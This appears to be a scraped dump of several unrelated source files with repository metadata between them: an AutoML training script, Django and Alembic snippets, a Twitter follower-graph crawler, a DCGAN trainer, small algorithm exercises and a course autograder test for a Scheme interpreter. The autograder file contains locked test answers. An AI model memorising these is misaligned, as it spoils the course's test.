df_y = df.target
df_X = df.drop('target', axis=1)
print('Dataset read, shape {}'.format(df_X.shape))
# dict with data necessary to make predictions
model_config = {}
# features from datetime
df_X = transform_datetime_features(df_X)
# missing values
    if df_X.isnull().values.any():
model_config['missing'] = True
df_X.fillna(-1, inplace=True)
# categorical encoding
import operator
unique_values = {}
for col_name in list(df_X.columns):
col_unique_values = df_X[col_name].unique()
if 2 < len(col_unique_values) <= hyper_params_onehot_max_uniq_values:
unique_values[col_name] = col_unique_values
sorted_values = sorted(unique_values.items(), key=lambda x: len(x[1]))
print('categorical columns:')
for col_name, values in sorted_values:
print(col_name + '[', len(values), ']')
categorical_values = {}
for col_name, unique_values in sorted_values:
if len(df_X.columns) + len(unique_values) <= hyper_params_max_columns:
categorical_values[col_name] = unique_values
for unique_value in unique_values:
df_X['onehot_{}={}'.format(col_name, unique_value)] = (df_X[col_name] == unique_value).astype(int)
# break if near max allowed columns
if len(df_X.columns) >= hyper_params_max_columns - 2:
break
model_config['categorical_values'] = categorical_values
# drop constant features
constant_columns = [
col_name
for col_name in df_X.columns
if df_X[col_name].nunique() == 1
]
df_X.drop(constant_columns, axis=1, inplace=True)
# use only numeric columns
used_columns = [
col_name
for col_name in df_X.columns
if col_name.startswith('number') or col_name.startswith('onehot')
]
df_X = df_X[used_columns]
# remove high-correlate columns
corr_cols = {}
corr = df_X.corr()
print('detecting correlation >', hyper_params_corr_limit, ':')
for i in range(corr.shape[0]):
for j in range(i, corr.shape[1]):
v = corr.iloc[i, j]
if abs(v) > hyper_params_corr_limit and i != j:
corr_cols[corr.columns[j]] = True
print(corr.index[i], corr.columns[j], v)
print(corr_cols.keys())
df_X.drop( list(corr_cols.keys()), axis=1, inplace=True )
model_config['used_columns'] = df_X.columns
# scaling - in auto_ml
#scaler = StandardScaler()
#df_X = scaler.fit_transform(df_X)
#model_config['scaler'] = scaler
# fitting
column_descriptions = {
'target': 'output'
}
model_config['mode'] = args.mode
if args.mode == 'regression':
type_of_estimator = 'regressor'
model_names = ['LGBMRegressor']
#['LGBMRegressor']
#'GradientBoostingRegressor']
# XGBRegressor' ]
# LGBMRegressor']
# 'CatBoostRegressor']
# 'XGBRegressor'] #,
# 'DeepLearningRegressor']
#model = Ridge()
else:
type_of_estimator = 'classifier'
model_names = ['XGBClassifier'] #,'DeepLearningClassifier']
#model = LogisticRegression()
model_config['model_names'] = model_names
df_X['target'] = df_y
    ml_predictor = Predictor(type_of_estimator=type_of_estimator, column_descriptions=column_descriptions)
ml_predictor.train(df_X, model_names=model_names )
file_name = ml_predictor.save()
model_config['model_file'] = file_name
#model.fit(df_X, df_y)
#model_config['model'] = model
model_config_filename = os.path.join(args.model_dir, 'model_config.pkl')
with open(model_config_filename, 'wb') as fout:
pickle.dump(model_config, fout, protocol=pickle.HIGHEST_PROTOCOL)
print('Train time: {}'.format(time.time() - start_time))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--train-csv', type=argparse.FileType('r'), required=True)
parser.add_argument('--model-dir', required=True)
parser.add_argument('--mode', choices=['classification', 'regression'], required=True)
args = parser.parse_args()
train( args )
|
[
"pomka@yandex.ru"
] |
pomka@yandex.ru
|
1b2e64f780ec7f16cbe47cb8915ab689f5e89234
|
bd4a3247155f51c30cf3c07346efbd30b234f424
|
/helpdesk/accounts/admin.py
|
ec0201faf57b29d458dfa7ee071204695332f51d
|
[] |
no_license
|
ps9999/helpdesk_django
|
581239151f366e6f2e76f5ce11651df2597f8c5f
|
517d44ad1c166bfebe1269585e5a1c7dcc69afe7
|
refs/heads/master
| 2023-05-04T10:54:40.195348
| 2021-05-30T17:49:09
| 2021-05-30T17:49:09
| 372,278,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
from django.contrib import admin
from .models import UserDetails
# Register your models here.
admin.site.register(UserDetails)
|
[
"developer18.punctualiti@gmail.com"
] |
developer18.punctualiti@gmail.com
|
d126a50f4d9c899393dc40a8dda55d2413361056
|
2d6323b8ccaf08a8929dba79fb9575c436977bd4
|
/docassemble_webapp/docassemble/webapp/alembic/versions/77e8971ffcbf_first_alembic_revision.py
|
af735caf90d6410f5f90040d7f83aab3a8717b21
|
[
"MIT"
] |
permissive
|
jhpyle/docassemble
|
f1c36e73d02807a7052b860dfceecdfa88e728c7
|
8726242cfbe3a15cad610dc2b518346be68ab142
|
refs/heads/master
| 2023-09-01T20:03:39.497473
| 2023-08-26T12:44:45
| 2023-08-26T12:44:45
| 34,148,903
| 691
| 300
|
MIT
| 2023-09-09T20:08:14
| 2015-04-18T02:09:32
|
Python
|
UTF-8
|
Python
| false
| false
| 511
|
py
|
"""first alembic revision
Revision ID: 77e8971ffcbf
Revises:
Create Date: 2017-08-13 09:07:33.368044
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix
# revision identifiers, used by Alembic.
revision = '77e8971ffcbf'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.add_column(dbtableprefix + 'user', sa.Column('modified_at', sa.DateTime))
def downgrade():
op.drop_column(dbtableprefix + 'user', 'modified_at')
|
[
"jhpyle@gmail.com"
] |
jhpyle@gmail.com
|
e7dcd01c1652e5c39955a5034b1397b2b507b1d2
|
7ebb9a09f0b033022ea12a1084aba64db6a83c61
|
/downloadUsersGraph.py
|
4388277760fc38204399e882deb6d91ba35ef86e
|
[
"Apache-2.0"
] |
permissive
|
bhaskarvk/ShellShockAnalysis
|
447c897509916c908c1ffbc08d2519414cf4d7b8
|
d60edf18da0cda0d2643b61e2a82ca4a57eed468
|
refs/heads/master
| 2021-01-02T22:31:21.547631
| 2015-05-13T14:32:04
| 2015-05-13T14:32:04
| 24,659,240
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,894
|
py
|
import tweepy
import sys
import jsonpickle
#import pandas as pd
import networkx as nx
import os
userDetailsCache = {}
def getUserDetails(api, cache, userIds):
uniqUserIds = set(userIds)
# return object
userDetails = list()
cachedUserIds = set([userId for userId in uniqUserIds if userId in cache])
userDetails.extend([cache[user] for user in cachedUserIds])
unCachedUserIds = list(uniqUserIds.difference(cachedUserIds))
usersToBeQueried = len(unCachedUserIds)
print("{0} users cached".format(len(cachedUserIds)))
print("Going to query {0} uncached users".format(usersToBeQueried))
usersQueried = 0
while (usersQueried < usersToBeQueried):
batch = unCachedUserIds[usersQueried:min(usersQueried+100, usersToBeQueried)]
usersQueried += 100
users = api.lookup_users(user_ids=batch) #TODO catch exception
userDetails.extend(users)
for user in users:
cache[user.id] = user
print("Got Back {0} users".format(len(userDetails)))
return userDetails
def getFollowersIds(api, user):
print("Going to query followers of user {0}[{1}]".format(user.screen_name, user.id))
    followersIds = tweepy.Cursor(api.followers_ids, id=user.id).items(10) # 10 most recent followers
try:
return [followerId for followerId in followersIds] # We need to traverse the cursor
except tweepy.TweepError as e:
return []
def getFollowersIds2(api, userId):
print("Going to query followers of user [{0}]".format(userId))
followersIds = tweepy.Cursor(api.followers_ids, id=userId,count=5000).items(5000)
try:
return [followerId for followerId in followersIds] # We need to traverse the cursor
except tweepy.TweepError as e:
return []
def stripString(s):
if s is None:
return ''
else:
return s.strip()
def addUser(G, user):
if (not G.has_node(user.id)):
G.add_node(user.id,
created_at=user.created_at.isoformat(),
created_at_epochOffset=user.created_at.strftime('%s'),
lang=stripString(user.lang),
name=stripString(user.name),
timezone=stripString(user.time_zone),
location=stripString(user.location),
followers_count=user.followers_count,
screen_name=stripString(user.screen_name),
total_tweets=user.statuses_count
)
def addUserIds(G, userIds):
G.add_nodes_from(userIds)
def addFollowers(G, user, followers):
followersCount = 0
for follower in followers:
followersCount += 1
addUser(G, follower)
G.add_edge(follower.id, user.id)
print("Added {0} followers to User {1}[{2}]".format(followersCount, user.screen_name, user.id))
def addFollowersIds(G, userId, followersIds):
for followerId in followersIds:
G.add_edge(followerId, userId)
print("Added {0} followers to User [{1}]".format(len(followersIds), userId))
def populateGraph(G, cache, userDetails, curLevel, maxLevel):
if(curLevel<maxLevel):
print("At level {0}".format(curLevel))
for user in userDetails:
if (curLevel == 0): # Already added by prev. call to populateGraph->addFollowers
addUser(G, user)
followersIds = getFollowersIds(api, user)
if(len(followersIds)>0):
followers = getUserDetails(api, cache, followersIds)
addFollowers(G, user, followers)
populateGraph(G, cache, followers, curLevel+1, maxLevel)
else:
print("Reached max level of {0}".format(maxLevel))
def populateIdGraph(G, userIds, curLevel, maxLevel):
if(curLevel<maxLevel):
print("At level {0}".format(curLevel))
if(curLevel==0):
addUserIds(G, userIds)
for userId in userIds:
followersIds = getFollowersIds2(api, userId)
if(len(followersIds)>0):
addFollowersIds(G, userId, followersIds)
populateIdGraph(G, followersIds, curLevel+1, maxLevel)
else:
print("Reached max level of {0}".format(maxLevel))
# Don't buffer stdout, so we can tail the log output redirected to a file
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
# API and ACCESS KEYS
API_KEY = sys.argv[1]
API_SECRET = sys.argv[2]
userIdfName = sys.argv[3]
outfName = sys.argv[4]
auth = tweepy.AppAuthHandler(API_KEY, API_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
if (not api):
print ("Can't Authenticate Bye!")
sys.exit(-1)
with open(userIdfName, 'r') as inp:
authors = [line.rstrip('\n') for line in inp]
#authorDetails = getUserDetails(api, userDetailsCache, authors)
G = nx.DiGraph()
populateIdGraph(G, authors, 0, 3)
nx.write_gexf(G, outfName)
|
[
"bhaskar.karambelkar1@one.verizon.com"
] |
bhaskar.karambelkar1@one.verizon.com
|
04f64864c4808ff07643657ba76b4819ca99b6cf
|
ddef64902d50174004c86d45adbf88fb0924f0a0
|
/train.py
|
d81a370f5103907b06397a854544e735bfac0296
|
[
"MIT"
] |
permissive
|
Babibubebon/DCGAN-chainer
|
731a531db8afc51b4b026e8eb1476493bc116dd2
|
1beb499c559362907a0fd79cb641ad5ba10a0780
|
refs/heads/master
| 2021-05-01T09:13:00.708857
| 2017-01-16T17:22:58
| 2017-01-16T17:22:58
| 75,496,801
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,300
|
py
|
#!/usr/bin/env python
import argparse
import os
import sys
import numpy as np
from PIL import Image
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import Variable
from chainer import serializers
from chainer import training
from chainer.training import extensions
from net import Generator, Discriminator
from generate import ext_output_samples
# network
nz = 100 # of dim for Z
ngf = 512 # of gen filters in first conv layer
ndf = 64 # of discrim filters in first conv layer
nc = 3 # image channels
size = 64 # size of output image
# optimizer
learning_rate = 0.001
beta1 = 0.5
lr_decay = {
"rate": 0.85,
"target": 0.0001,
"trigger": (1000, 'iteration')
}
weight_decay = 1e-5
gradient_clipping = 100
class Dataset(chainer.datasets.ImageDataset):
def get_example(self, i):
path = os.path.join(self._root, self._paths[i])
f = Image.open(path).convert('RGB')
return self.preprocess(f)
def preprocess(self, image):
cimg = np.asarray(image, dtype=np.float32).transpose(2, 0, 1)
rnd = np.random.randint(2)
if rnd == 1:
# flip
cimg = cimg[:,:,::-1]
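        # map pixel values from [0, 255] to roughly [-1, 1] for the DCGAN input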
return (cimg - 128) / 128
class DCGANUpdater(chainer.training.StandardUpdater):
def update_core(self):
x_batch = self.converter(self._iterators['main'].next(), self.device)
z_batch = self.converter(np.random.uniform(-1, 1, (len(x_batch), nz)).astype(np.float32), self.device)
G_optimizer = self._optimizers['generator']
D_optimizer = self._optimizers['discriminator']
G_loss_func = G_optimizer.target.get_loss_func(D_optimizer.target)
D_loss_func = D_optimizer.target.get_loss_func(G_optimizer.target)
G_optimizer.update(G_loss_func, Variable(z_batch))
D_optimizer.update(D_loss_func, Variable(x_batch), Variable(z_batch))
def main():
parser = argparse.ArgumentParser(description='DCGAN with chainer')
parser.add_argument('--batchsize', '-b', type=int, default=128,
help='Number of images in each mini-batch')
parser.add_argument('--epoch', '-e', type=int, default=1000,
help='Number of sweeps over the dataset to train')
parser.add_argument('--gpu', '-g', type=int, default=-1,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--out', '-o', default='result',
help='Directory to output the result')
parser.add_argument('--initmodel', '-m', default='', nargs=2,
help='Initialize the model from given file')
parser.add_argument('--resume', '-r', default='',
help='Resume the optimization from snapshot')
parser.add_argument('image_dir', default='images', help='Directory of training data')
parser.add_argument('--test', action='store_true', default=False)
args = parser.parse_args()
print('GPU: {}'.format(args.gpu))
print('# Minibatch-size: {}'.format(args.batchsize))
print('# epoch: {}'.format(args.epoch))
# check paths
if not os.path.exists(args.image_dir):
sys.exit('image_dir does not exist.')
# Set up a neural network to train
G = Generator(ngf, nz, nc, size)
D = Discriminator(ndf)
if args.gpu >= 0:
chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current
G.to_gpu()
D.to_gpu()
xp = np if args.gpu < 0 else chainer.cuda.cupy
# Setup an optimizer
G_optimizer = chainer.optimizers.Adam(alpha=learning_rate, beta1=beta1)
D_optimizer = chainer.optimizers.Adam(alpha=learning_rate, beta1=beta1)
G_optimizer.use_cleargrads()
D_optimizer.use_cleargrads()
G_optimizer.setup(G)
D_optimizer.setup(D)
if weight_decay:
G_optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))
D_optimizer.add_hook(chainer.optimizer.WeightDecay(weight_decay))
if gradient_clipping:
G_optimizer.add_hook(chainer.optimizer.GradientClipping(gradient_clipping))
D_optimizer.add_hook(chainer.optimizer.GradientClipping(gradient_clipping))
# Init models
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_npz(args.initmodel[0], G)
serializers.load_npz(args.initmodel[1], D)
# Load dataset
files = os.listdir(args.image_dir)
dataset = Dataset(files, args.image_dir)
dataset_iter = chainer.iterators.MultiprocessIterator(dataset, args.batchsize)
print('# samples: {}'.format(len(dataset)))
# Set up a trainer
optimizers = {'generator': G_optimizer, 'discriminator': D_optimizer}
updater = DCGANUpdater(dataset_iter, optimizers, device=args.gpu)
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
if lr_decay:
trainer.extend(extensions.ExponentialShift(
'alpha', rate=lr_decay["rate"], target=lr_decay["target"], optimizer=G_optimizer),
trigger=lr_decay["trigger"])
trainer.extend(extensions.ExponentialShift(
'alpha', rate=lr_decay["rate"], target=lr_decay["target"], optimizer=D_optimizer),
trigger=lr_decay["trigger"])
log_interval = (100, 'iteration') if args.test else (1, 'epoch')
snapshot_interval = (1000, 'iteration') if args.test else (1, 'epoch')
suffix = '_{0}_{{.updater.{0}}}'.format(log_interval[1])
trainer.extend(extensions.snapshot(
filename='snapshot' + suffix), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object(
G, 'gen' + suffix), trigger=log_interval)
trainer.extend(extensions.snapshot_object(
D, 'dis' + suffix), trigger=log_interval)
trainer.extend(ext_output_samples(
10, 'samples' + suffix, seed=0), trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport(
['epoch', 'iteration', 'generator/loss', 'discriminator/loss', 'elapsed_time']), trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=20))
if args.resume:
# Resume from a snapshot
chainer.serializers.load_npz(args.resume, trainer)
# Run the training
trainer.run()
if __name__ == '__main__':
main()
|
[
"babibubebon@babibubebo.org"
] |
babibubebon@babibubebo.org
|
b76d58cb204ba500878f7cd3c2ede8c946049e1e
|
6d43c34b418233d9b81980e6cba01a26d6a3e91a
|
/baekjoon/Bronze/b_14613.py
|
bc85792a2757157456ca9059dc0112cad935f09b
|
[] |
no_license
|
spongebob03/Playground
|
1cbba795294e5d609cb0ae951568f62d6f7e8dbc
|
4acae2f742f9f8b7e950053207e7c9f86cea6233
|
refs/heads/master
| 2021-01-05T04:22:36.303355
| 2020-05-22T13:59:28
| 2020-05-22T13:59:28
| 240,878,997
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
# score from 20 plays: +50 per win, -50 per loss, 0 per draw
import sys
def score(w,l,d):
r=20*w*50+20*l*(-50)+20*d*0
return r
x=sys.stdin.readline().split()
w=float(x[0])
l=float(x[1])
d=float(x[2])
print(score(w,l,d))
|
[
"sunhee1996@naver.com"
] |
sunhee1996@naver.com
|
bc60efd01c040cb518b3422687792c91c73cfecf
|
72b349152a3af42a6f071071882e9c08720a1b75
|
/121.py
|
c18e98d981f348db8c0ae4996a87e3d85b8a9870
|
[] |
no_license
|
Deepakdk7/PlayerSet13
|
3ffed2fb4bcd5c043de647f93700c4003687da29
|
fc7d559636ed83a231b1bf1681d21485ee134030
|
refs/heads/master
| 2020-06-05T15:28:38.442065
| 2019-07-08T14:35:58
| 2019-07-08T14:35:58
| 192,473,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
ax=int(input())
c=[]
for i in range(0,ax):
c.append(input())
c=sorted(c)
print(c[0])
|
[
"noreply@github.com"
] |
Deepakdk7.noreply@github.com
|
39aba911814d6e695bacb578bca4d346e8d77f35
|
3ae4c65b8463c0ae2d6f4edfae85a62b9922230f
|
/SimDis/exps/arxiv/base_exp_simDis.py
|
704a19939b7f41f2efef9143197a78c658f0ad52
|
[
"MIT"
] |
permissive
|
dungdinhanh/SimDis
|
2eb2e946ad38d10d7e8e0a03b4dc53e59436438c
|
0871a217a756acc268f35f802e35b01b12817f0d
|
refs/heads/main
| 2023-06-15T15:03:48.114277
| 2021-07-15T16:01:49
| 2021-07-15T16:01:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,731
|
py
|
# encoding: utf-8
import os
import itertools
import torch
import torch.nn as nn
import torch.distributed as dist
from SimDis.models.sim_dis_train_model import SimDis_Model
from SimDis.exps.arxiv import base_exp
from SimDis.layers.optimizer import LARS_SGD
class Exp(base_exp.BaseExp):
def __init__(self, args):
super(Exp, self).__init__()
self.args = args
# ------------------------------------- model config ------------------------------ #
self.param_momentum = args.ema_moment
# ------------------------------------ data loader config ------------------------- #
self.data_num_workers = 10
# ------------------------------------ training config --------------------------- #
self.warmup_epochs = 10
self.max_epoch = args.epochs
self.warmup_lr = 1e-6
self.basic_lr_per_img = args.basic_lr / 256.0
self.lr = self.basic_lr_per_img * args.word_size * args.nr_gpu * args.batchsize
self.weight_decay = 1e-4
self.momentum = 0.9
self.print_interval = 200
self.n_views = args.n_views
self.exp_name = '{}_stu_{}_tea_{}_ema_{}_lr_{}_syncBN_{}_opt_{}_epoch_{}_BS_{}_GPUs_{}'.format(
args.method, args.model_s, args.model_t, args.ema_moment, self.lr,
args.syncBN, args.optimizer, args.epochs, args.batchsize, args.word_size * args.nr_gpu
)
def get_model(self):
if "model" not in self.__dict__:
self.model = SimDis_Model(self.args, self.param_momentum, len(self.data_loader["train"]) * self.max_epoch)
return self.model
def get_data_loader(self, batch_size, is_distributed, if_transformer=False):
if "data_loader" not in self.__dict__:
if if_transformer:
pass
else:
from SimDis.data.transforms import byol_transform
from SimDis.data.dataset import SSL_Dataset
transform = byol_transform()
train_set = SSL_Dataset(transform)
sampler = None
if is_distributed:
sampler = torch.utils.data.distributed.DistributedSampler(train_set)
dataloader_kwargs = {"num_workers": self.data_num_workers, "pin_memory": False}
dataloader_kwargs["sampler"] = sampler
dataloader_kwargs["batch_size"] = batch_size
dataloader_kwargs["shuffle"] = False
dataloader_kwargs["drop_last"] = True
train_loader = torch.utils.data.DataLoader(train_set, **dataloader_kwargs)
self.data_loader = {"train": train_loader, "eval": None}
return self.data_loader
def get_optimizer(self, model, batch_size):
        # Note: here we only optimize the student encoder
if "optimizer" not in self.__dict__:
if self.warmup_epochs > 0:
lr = self.warmup_lr
else:
lr = self.lr
paras = []
if self.args.model_s is not None: paras += list(model.student.parameters())
if (self.args.model_t is not None) and (not self.args.offline) : paras += list(model.teacher.parameters())
if self.args.optimizer == 'SGD':
self.optimizer = torch.optim.SGD(paras, lr=lr, weight_decay=self.weight_decay, momentum=self.momentum)
if self.args.rank == 0: print(self.args.optimizer, 'Optimizer is used!')
elif self.args.optimizer == 'LARS':
params_lars = []
params_exclude = []
for m in self.model.modules():
if isinstance(m, nn.BatchNorm1d) or isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.SyncBatchNorm):
params_exclude.append(m.weight)
params_exclude.append(m.bias)
elif isinstance(m, nn.Linear):
params_lars.append(m.weight)
params_exclude.append(m.bias)
elif isinstance(m, nn.Conv2d):
params_lars.extend(list(m.parameters()))
assert len(params_lars) + len(params_exclude) == len(list(self.model.parameters()))
self.optimizer = LARS_SGD(
[{"params": params_lars, "lars_exclude": False}, {"params": params_exclude, "lars_exclude": True}],
lr=lr,
weight_decay=self.weight_decay,
momentum=self.momentum,
)
if self.args.rank == 0: print(self.args.optimizer, 'Optimizer is used!')
return self.optimizer
|
[
"jindong@MAQ22589.redmond.corp.microsoft.com"
] |
jindong@MAQ22589.redmond.corp.microsoft.com
|
8d0509ef4d9588c50f4b53e2600484a81696135d
|
f67beb57a4b54c5e5c5dd8ac030f6adebc1fd9cf
|
/Offer/6.py
|
10f402f56449c35e89abf9a0b5862eb3e0cdfbbb
|
[] |
no_license
|
jasonliujiang/DataStructurePython
|
e00e526ce4f65542c5cdd88da05e707e29f1b815
|
ec4768b6b49e1dfa96f5fef66e4d4ee3d09b2ccf
|
refs/heads/master
| 2022-01-30T19:07:02.135289
| 2019-07-07T01:59:54
| 2019-07-07T01:59:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
"""
ๆ่ฝฌๆฐ็ป็ๆๅฐๆฐๅญ
Q: ๆไธไธชๆฐ็ปๆๅผๅง็่ฅๅนฒไธชๅ
็ด ๆฌๅฐๆฐ็ป็ๆซๅฐพ๏ผๆไปฌ็งฐไนไธบๆฐ็ป็ๆ่ฝฌใ ่พๅ
ฅไธไธช้ๅๆๅบ็ๆฐ็ป็ไธไธชๆ่ฝฌ๏ผ่พๅบๆ่ฝฌๆฐ็ป็ๆๅฐๅ
็ด ใ ไพๅฆๆฐ็ป{3,4,5,1,2}ไธบ{1,2,3,4,5}็ไธไธชๆ่ฝฌ๏ผ่ฏฅๆฐ็ป็ๆๅฐๅผไธบ1ใ NOTE๏ผ็ปๅบ็ๆๆๅ
็ด ้ฝๅคงไบ0๏ผ่ฅๆฐ็ปๅคงๅฐไธบ0๏ผ่ฏท่ฟๅ0ใ
A: ไบๅๆฅๆพ็ๅๅฝข๏ผๆ่ฝฌๆฐ็ป็้ฆๅ
็ด ่ฏๅฎไธๅฐไบๆ่ฝฌๆฐ็ป็ๅฐพๅ
็ด ๏ผๆพไธไธชไธญ้ด็น๏ผๅฆๆไธญ้ด็นๆฏ้ฆๅ
็ด ๅคง๏ผ่ฏดๆๆๅฐๆฐๅญๅจไธญ้ด็นๅ้ข๏ผๅฆๆไธญ้ด็นๆฏๅฐพๅ
็ด ๅฐ๏ผ่ฏดๆๆๅฐๆฐๅญๅจไธญ้ด็นๅ้ขใ็ถๅๅพช็ฏใ ไฝๆฏๅจไธๆฌกๅพช็ฏไธญ๏ผ้ฆๅ
็ด ๅฐไบๅฐพๅ
็ด ๏ผ่ฏดๆ่ฏฅๆฐ็ปๆฏๆๅบ็๏ผ้ฆๅ
็ด ๅฐฑๆฏๆๅฐๆฐๅญ๏ผๅฆๆๅบ็ฐ้ฆๅ
็ด ใๅฐพๅ
็ด ใไธญ้ดๅผไธ่
็ธ็ญ๏ผๅๅช่ฝๅจๆญคๅบๅไธญ้กบๅบๆฅๆพใ
"""
# -*- coding:utf-8 -*-
class Solution:
def minNumberInRotateArray(self, rotateArray):
# write code here
if len(rotateArray) == 0:
return 0
front = 0
rear = len(rotateArray) - 1
minVal = rotateArray[0]
if rotateArray[front] < rotateArray[rear]:
return rotateArray[front]
else:
while (rear - front) > 1:
mid = (front + rear) // 2
                if rotateArray[front] == rotateArray[rear] == rotateArray[mid]:
                    # cannot tell which half holds the minimum; fall back to a sequential scan
                    for i in range(1, len(rotateArray)):
                        if rotateArray[i] < minVal:
                            minVal = rotateArray[i]
                    return minVal
                elif rotateArray[mid] >= rotateArray[front]:
                    front = mid
                else:
                    rear = mid
minVal = rotateArray[rear]
return minVal
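# Usage sketch (illustrative): Solution().minNumberInRotateArray([3, 4, 5, 1, 2]) -> 1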
|
[
"jason_liujiang@163.com"
] |
jason_liujiang@163.com
|
895d715fb433475c1e0bbac0e0de220755191440
|
c0df13f6936d433dd317b825fb15f1a19a0d8c91
|
/python/challenges/multi_bracket_validation/multi_bracket_validation.py
|
bfba9a0fe2afc414e817ff0b0937b8270c696dc4
|
[
"MIT"
] |
permissive
|
kmangub/data-structures-and-algorithms
|
17400365e28f562f4f213cefc4f278faec69c100
|
44b42c0d892f39593997bccb793eacc4d7d98906
|
refs/heads/master
| 2023-04-07T00:55:39.015895
| 2021-04-07T15:24:16
| 2021-04-07T15:24:16
| 298,032,265
| 0
| 0
|
MIT
| 2021-04-07T15:24:17
| 2020-09-23T16:38:52
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
def multi_bracket_validation(string):
"""
This function will check to see if the brackets are matching. It creates
an empty list, which is our stack and we will iterate through each
character.
Any opening brackets will be appended to our stack.
When it encounters a closing bracket, it will check if the stack is empty and
will return false if it is.
If the stack is not empty, it will pop the last element and it will
compare to the closing bracket.
It will return false it doesn't match right away. Once we are done
iterating, it checks the length again and return the appropriate Boolean
"""
stack = []
for char in string:
print(char)
if char == '{' or char == '(' or char == '[':
stack.append(char)
elif char == '}' or char == ')' or char == ']':
if len(stack) == 0:
return False
top_of_stack = stack.pop()
if not compare(top_of_stack, char):
return False
if len(stack) != 0:
print('stack not empty...')
return False
print(stack)
return True
def compare(opening, closing):
"""
This function supplements our multi bracket validation.
If the statement returns False, the function returns False.
"""
if opening == '{' and closing == '}':
return True
if opening == '(' and closing == ')':
return True
if opening == '[' and closing == ']':
return True
return False
print(multi_bracket_validation('{(})'))
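# Expected result: False ('}' arrives while '(' is on top of the stack)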
|
[
"karlomangubat92@gmail.com"
] |
karlomangubat92@gmail.com
|
ae2e93a6208b4010177eb59cd1e9848965a91f17
|
09f370c50cfe220f623f57b30489a9ddb31f4441
|
/d2/sol1.py
|
7154678fb0a318c18324941507a3a0306fef9e18
|
[] |
no_license
|
chanin-shim/SWEA
|
bb755787d6d7b62bf4a62b5fb5bd3b8b166cffac
|
2dcfdd4feeb0027e50a5a82e58326b399466f816
|
refs/heads/master
| 2023-04-14T12:14:19.662433
| 2021-04-22T13:55:35
| 2021-04-22T13:55:35
| 339,105,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
import sys
sys.stdin = open("input.txt")
T = int(input())
# scratch notes (commented out so the file parses):
# 19(T) -> 11(L)
# 6(G) -> 34(i)
#      -> 31(f)
# 38(m) -> 30(e)
for tc in range(1, T+1):
print("#{} ".format(tc, ))
|
[
"chanin.shim@gmail.com"
] |
chanin.shim@gmail.com
|
3949fcb5e38cae1dfee79add93d17672db7ce79f
|
6909de83dd90ee1169d6c453c327ab2ce2687485
|
/scheme/tests/08.py
|
4081350d6bc2a5a3e87e9b394b45fcdb83bd2d98
|
[] |
no_license
|
dantefung/cs61a-2021-summer
|
730cb0b9ab7327c32c619779d71882531bf328dd
|
4f22f20fcfddfb5bf121081919310413209da1b2
|
refs/heads/master
| 2023-08-19T14:51:27.380738
| 2021-11-01T06:54:33
| 2021-11-01T06:54:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,570
|
py
|
test = {
"name": "Problem 8",
"points": 1,
"suites": [
{
"cases": [
{
"code": r"""
scm> (lambda (x y) (+ x y))
1456de84c3edf333b6f7aee0c0624b20
# locked
scm> (lambda (x)) ; type SchemeError if you think this causes an error
ec908af60f03727428c7ee3f22ec3cd8
# locked
""",
"hidden": False,
"locked": True,
},
{
"code": r"""
scm> (lambda (x) (+ x) (+ x x))
(lambda (x) (+ x) (+ x x))
""",
"hidden": False,
"locked": False,
},
{
"code": r"""
scm> (lambda () 2)
(lambda () 2)
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": "",
"teardown": "",
"type": "scheme",
},
{
"cases": [
{
"code": r"""
>>> env = create_global_frame()
>>> lambda_line = read_line("(lambda (a b c) (+ a b c))")
>>> lambda_proc = do_lambda_form(lambda_line.rest, env)
>>> lambda_proc.formals # use single quotes ' around strings in your answer
d106bb7be6b014a9d16d74410be4a8a5
# locked
>>> lambda_proc.body # the body is a *list* of expressions! Make sure your answer is a properly nested Pair.
0ef147cfe5caf670e985d95d923f4b06
# locked
""",
"hidden": False,
"locked": True,
},
{
"code": r"""
>>> env = create_global_frame()
>>> lambda_line = read_line("(lambda (x y) x)")
>>> lambda_proc = do_lambda_form(lambda_line.rest, env)
>>> isinstance(lambda_proc, LambdaProcedure)
True
>>> lambda_proc.env is env
True
>>> lambda_proc
LambdaProcedure(Pair('x', Pair('y', nil)), Pair('x', nil), <Global Frame>)
""",
"hidden": False,
"locked": False,
},
],
"scored": True,
"setup": r"""
>>> from scheme_reader import *
>>> from scheme import *
""",
"teardown": "",
"type": "doctest",
},
],
}
|
[
"wuyudi1109@gmail.com"
] |
wuyudi1109@gmail.com
|
b3e7ce620c23754a089a63d0309b815e97c65655
|
8756821493ab79aeb3f4fd6255470c415e1fbcf5
|
/server/api/user/urls.py
|
686a5a45b4e23f66d9a325b0045bd171abf152e5
|
[] |
no_license
|
aleloup-ops/Dashboard-EPITECH
|
462cbcec141fd3b9218ebde8a4c269cc6cab58a4
|
8871c55e89884ffddaaf851928d3220d3e8f9eab
|
refs/heads/main
| 2023-02-20T10:22:40.811112
| 2021-01-19T20:42:21
| 2021-01-19T20:42:21
| 317,262,364
| 1
| 1
